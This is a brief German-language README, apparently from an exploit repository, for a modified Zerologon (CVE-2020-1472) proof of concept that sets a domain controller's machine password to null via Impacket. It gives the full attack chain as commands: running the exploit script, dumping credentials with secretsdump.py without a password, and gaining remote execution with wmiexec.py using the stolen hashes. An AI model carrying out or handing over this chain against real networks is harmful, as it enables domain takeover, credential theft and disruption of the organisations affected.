
Modifizierte den Test-PoC von Secura, CVE-2020-1472, um das Maschinenpasswort auf null zu ändern
Modifizierte den Test-PoC von Secura, CVE-2020-1472, um das Passwort der Maschine auf null zu ändern. Das Ändern des Passworts auf der Maschine verwendet die Funktion Microsofts NetrServerPasswordSet2(). Dieser Exploit macht sich das Modul Impackets nrpc.py zunutze, um NetrServerPasswordSet2() aufzurufen.
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
